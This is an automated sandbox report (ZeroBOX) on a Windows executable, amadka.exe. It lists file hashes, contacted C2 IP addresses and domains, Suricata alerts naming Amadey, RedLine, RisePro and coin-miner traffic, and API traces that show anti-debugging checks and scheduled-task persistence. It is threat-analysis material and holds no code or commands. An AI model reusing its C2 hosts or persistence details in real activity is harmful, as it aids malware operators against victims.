Summary | ZeroBOX

amadka.exe

Gen1 RedLine stealer Lumma Stealer RedlineStealer Generic Malware Amadey Themida Packer .NET framework(MSIL) Malicious Library Malicious Packer Downloader Antivirus UPX ScreenShot Http API Anti_VM Code injection PWS AntiDebug PE File AntiVM PE32
Category Machine Started Completed
FILE s1_win7_x6401 June 15, 2024, 8:20 a.m. June 15, 2024, 8:23 a.m.
Size 1.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5a12fd39ea2482c5ef29e1ca1fe5c083
SHA256 86d33656765f99e2290c82d877955da93e623584775f1d5dea0249b307aa5489
CRC32 6EB1C41A
ssdeep 49152:yTWpXiuOiC28Np0gtNcjSXgs7WkFDb0q5ia0:yTWfrC2SersgQBFDb0qEa0
Yara
  • PE_Header_Zero - PE File Signature
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • IsPE32 - (no description)

IP Address Status Action
104.26.5.15 Active Moloch
147.45.47.126 Active Moloch
147.45.47.155 Active Moloch
163.172.154.142 Active Moloch
164.124.101.2 Active Moloch
172.67.19.24 Active Moloch
172.67.198.131 Active Moloch
18.244.65.161 Active Moloch
182.162.106.33 Active Moloch
185.172.128.19 Active Moloch
185.215.113.67 Active Moloch
23.41.113.9 Active Moloch
31.31.198.35 Active Moloch
34.117.186.192 Active Moloch
51.15.89.13 Active Moloch
77.91.77.81 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49165 2014819 ET INFO Packed Executable Download Misc activity
TCP 147.45.47.155:80 -> 192.168.56.101:49164 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 77.91.77.81:80 -> 192.168.56.101:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49165 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49165 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49171 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 147.45.47.155:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 147.45.47.155:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49172 2014819 ET INFO Packed Executable Download Misc activity
TCP 77.91.77.81:80 -> 192.168.56.101:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 77.91.77.81:80 -> 192.168.56.101:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 77.91.77.81:80 -> 192.168.56.101:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 147.45.47.155:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2049060 ET MALWARE RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49165 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49165 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 147.45.47.155:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.101:49183 2400032 ET DROP Spamhaus DROP Listed Traffic Inbound group 33 Misc Attack
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2046045 ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.101:49188 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.67:40960 -> 192.168.56.101:49183 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 185.215.113.67:40960 -> 192.168.56.101:49183 2046056 ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49229 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49229 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49229 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49229 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49233 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 77.91.77.81:80 -> 192.168.56.101:49172 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 18.244.65.161:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49233 -> 185.172.128.19:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49233 -> 185.172.128.19:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2049060 ET MALWARE RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49264 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49264 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49264 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 147.45.47.126:58709 -> 192.168.56.101:49179 2046267 ET MALWARE [ANY.RUN] RisePro TCP (External IP) A Network Trojan was detected
TCP 192.168.56.101:49269 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2049060 ET MALWARE RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.101:49267 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49271 -> 31.31.198.35:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:52815 -> 164.124.101.2:53 2033268 ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org) Potential Corporate Privacy Violation
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49183 -> 185.215.113.67:40960 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49276 -> 172.67.19.24:443 906200068 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner) undefined
UDP 192.168.56.101:58297 -> 164.124.101.2:53 2033268 ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org) Potential Corporate Privacy Violation
TCP 192.168.56.101:49279 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49281 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) A Network Trojan was detected
TCP 192.168.56.101:49179 -> 147.45.47.126:58709 2049060 ET MALWARE RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.101:49236 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 77.91.77.81:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49255 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49266 -> 104.26.5.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49280 -> 172.67.198.131:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49264 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49188
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1
192.168.56.101:49238
18.244.65.161:443
C=US, O=Amazon, CN=Amazon RSA 2048 M01 CN=*.cloudfront.net fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52
TLSv1
192.168.56.101:49269
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1
192.168.56.101:49267
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLS 1.2
192.168.56.101:49271
31.31.198.35:443
C=US, O=Let's Encrypt, CN=R11 CN=kmsandallapp.ru 26:c0:93:6a:03:1b:96:aa:25:61:71:21:f5:de:ad:77:51:bf:39:19
TLS 1.3
192.168.56.101:49276
172.67.19.24:443
None None None
TLSv1
192.168.56.101:49279
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1
192.168.56.101:49281
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1
192.168.56.101:49236
172.67.198.131:443
None None None
TLSv1
192.168.56.101:49255
172.67.198.131:443
C=US, O=Let's Encrypt, CN=E5 CN=boredombusters.online ae:46:98:37:44:2d:ec:1c:ce:ae:4b:ef:67:3e:b5:93:42:fe:8c:94
TLSv1
192.168.56.101:49266
104.26.5.15:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=db-ip.com 1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25
TLS 1.3
192.168.56.101:49273
51.15.89.13:10943
None None None
TLS 1.3
192.168.56.101:49278
163.172.154.142:14433
None None None
TLSv1
192.168.56.101:49280
172.67.198.131:443
None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "NewKindR.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: U
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: n
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: g
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: P
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: U
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: P
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: h
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: a
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: m
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: t
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fb400
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fbcc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fbcc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007fbb80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516928
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00516ea8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005170a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
